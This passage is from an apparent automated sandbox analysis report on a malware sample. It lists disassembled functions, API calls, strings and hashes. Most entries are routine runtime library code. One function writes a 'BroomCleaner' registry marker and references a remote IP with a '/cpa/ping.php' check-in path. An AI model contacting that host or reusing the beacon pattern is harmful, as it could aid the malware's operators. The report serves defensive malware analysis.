WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 04155D78
WriteFile.KERNEL32(?,?,00000000,041563EF,00000000,?,?,?,?,?,?,?,?,?,041563EF,?), ref: 04155D97
WriteFile.KERNEL32(?,?,00000001,041563EF,00000000,?,?,?,?,?,?,?,?,?,041563EF,?), ref: 04155DD0

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: ea1eba185b35037ecad8f2cc2ec4a8ecf7ebea9474038638c9921af284310b9c
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: AD51B771A00249EFDB10CFA8D8C5BEEBBF5EF09310F14415AE965E7261D730A951CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0040A6FB
___except_validate_context_record.LIBVCRUNTIME ref: 0040A703
_ValidateLocalCookies.LIBCMT ref: 0040A791
__IsNonwritableInCurrentImage.LIBCMT ref: 0040A7BC
_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 041663C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 041663C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 041663EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 04166471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 04166492

Strings

Installed, xrefs: 041663D0, 041663FE, 0416641D, 0416641E
SOFTWARE\BroomCleaner, xrefs: 041663CE, 041663E1

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 47c016cab9ad86bf42bb3fd59527e17c115a04439f697807e6a6849c76fad204
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: E0319A71A00219EFDF149FA8CC90AFEBB79FB48258F04016DE80277241D7716E46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 791c7b4aae0b1c2b416b1f562a5509af260bb6d414dca8c56a91ecd19c1a7e4a
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 0415F513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0415F25A: _free.LIBCMT ref: 0415F283

_free.LIBCMT ref: 0415F561

Part of subcall function 04156501: HeapFree.KERNEL32(00000000,00000000,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?), ref: 04156517
Part of subcall function 04156501: GetLastError.KERNEL32(?,?,0415F288,?,00000000,?,00000000,?,0415F52C,?,00000007,?,?,0415F920,?,?), ref: 04156529

_free.LIBCMT ref: 0415F56C
_free.LIBCMT ref: 0415F577
_free.LIBCMT ref: 0415F5CB
_free.LIBCMT ref: 0415F5D6
_free.LIBCMT ref: 0415F5E1
_free.LIBCMT ref: 0415F5EC

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: f2ff023f2e556f81bc165f0ac4737a3cde7766512c9a019b91f434d6123ae12c
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: A71154B2550704EAEA30B7B0DCCAFCB7BDD6F44704F800815AEBE6A070DB65F5054A91

Uniqueness

Uniqueness Score: -1.00%

Function 041443F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 041443F5
std::_Lockit::_Lockit.LIBCPMT ref: 04144404
int.LIBCPMT ref: 0414441B

Part of subcall function 0414157F: std::_Lockit::_Lockit.LIBCPMT ref: 04141590
Part of subcall function 0414157F: std::_Lockit::~_Lockit.LIBCPMT ref: 041415AA

std::locale::_Getfacet.LIBCPMT ref: 04144424
std::_Facet_Register.LIBCPMT ref: 04144455
std::_Lockit::~_Lockit.LIBCPMT ref: 0414446B
__CxxThrowException@8.LIBVCRUNTIME ref: 04144491

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: e4fa42ba376180d7027d0a68188b567f6a38781c353bd841ee0cc474e0d31ca3
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: DC11E7729001189BDB04EBA4DC84BEE7775EFC4328F15455AE825B7290DB74BE01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: 1a48900830679c46dc0be6a0f1d465924297f1cf3026a4340555d262ddfbec7c
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: ca0cfb35cbf3f9a9490d45cd706726dd781f1bc8c642c101c97a62d8b5f5316d
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 04143651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04143656
std::_Lockit::_Lockit.LIBCPMT ref: 04143665
int.LIBCPMT ref: 0414367C

Part of subcall function 0414157F: std::_Lockit::_Lockit.LIBCPMT ref: 04141590
Part of subcall function 0414157F: std::_Lockit::~_Lockit.LIBCPMT ref: 041415AA

std::locale::_Getfacet.LIBCPMT ref: 04143685
std::_Facet_Register.LIBCPMT ref: 041436B6
std::_Lockit::~_Lockit.LIBCPMT ref: 041436CC
__CxxThrowException@8.LIBVCRUNTIME ref: 041436F2

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: 4189a2b6a23253f8f8a61fc8b40c022aef465e1254ede7bc318af57befe0617e
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: 1311A372E00129ABDB05EFA4C884AEE7775EFC4324F15055AE835B72D0DB74AA04CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0414385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04143861
std::_Lockit::_Lockit.LIBCPMT ref: 04143870
int.LIBCPMT ref: 04143887

Part of subcall function 0414157F: std::_Lockit::_Lockit.LIBCPMT ref: 04141590
Part of subcall function 0414157F: std::_Lockit::~_Lockit.LIBCPMT ref: 041415AA

std::locale::_Getfacet.LIBCPMT ref: 04143890
std::_Facet_Register.LIBCPMT ref: 041438C1
std::_Lockit::~_Lockit.LIBCPMT ref: 041438D7
__CxxThrowException@8.LIBVCRUNTIME ref: 041438FD

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 2c603b3f15496d1ab3254d3468bd2afe652cfe085cee1cab30852aaf36138c1e
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: 66110A72E001199BCB05EBA4C884AEEB774EFC4324F15055AE831B72D0DB74AA00C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 04167D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 04167E37
__FindPESection.LIBCMT ref: 04167E51

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: fee2714570353f164502f0eda4548af081f62ac88bdd1f39abdd8a1a374e5c88
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: A0A1C032A01615CFDB24DF68C9C0AADB7B4EB08314F1446AADC26AB390D735FC55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 041569A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,04156BF7,00000001,00000001,?), ref: 04156A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,04156BF7,00000001,00000001,?,?,?,?), ref: 04156A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04156B80
__freea.LIBCMT ref: 04156B8D

Part of subcall function 04157CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04157CDE

__freea.LIBCMT ref: 04156B96
__freea.LIBCMT ref: 04156BBB

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: 384e969b82dc137e91c086b54223d9e80a56596aefd352187857dad3201d4510
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: 2351C272710216EFEB254E60CCC1EEB77AAEB80754F554268EC29D71A0EB34FC408694

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 04151CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 04151CFF
__cftoe.LIBCMT ref: 04151D31

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: 0cba873cd3179a7327d498c2913af38654d29c5c88b7fed1dcd3b727d5328e05
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 9651C772D00205FBEB269F698CC4BEA77A9EF49364F504659EC34961B0EF31F94086A4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 0414CC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0414CC19,0414A4C2), ref: 0414CC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0414CC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0414CC57
SetLastError.KERNEL32(00000000,?,0414CC19,0414A4C2), ref: 0414CCA9

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: 5e0e455b5fb176bda1d11e6f138fcd56b6dd44ecae33c8f44b4709361e8bc6e6
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: EC01FC3230A3115EB7292F757DC8AA72B55EB8177A721027DE528920F0FF12681155C4

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 04156F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0414E697,?,?,?,0414ED94,?), ref: 04156F84
_free.LIBCMT ref: 04156FB7
_free.LIBCMT ref: 04156FDF
SetLastError.KERNEL32(00000000), ref: 04156FEC
SetLastError.KERNEL32(00000000), ref: 04156FF8
_abort.LIBCMT ref: 04156FFE

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4140000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: d03929d009fc6faca3200d605df3e7ca80fa46da6ccaf9b106453ad1a7ad2140
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: 8FF0D631A48600E6E22132756CD8BEB26159BC1775FA50065FC3D922F0EF21AC0241D5

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::eofbit set, xrefs: 004018A0

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 04141AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 04141B30
std::system_error::system_error.LIBCPMT ref: 04141B3F

Strings

ios_base::badbit set, xrefs: 04141AF7, 04141B18
ios_base::failbit set, xrefs: 04141B02, 04141B39
ios_base::eofbit set, xrefs: 04141B07

Memory Dump Source

Source File: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Offset: 04140000, based on PE: false

Joe Sandbox IDA Plugin

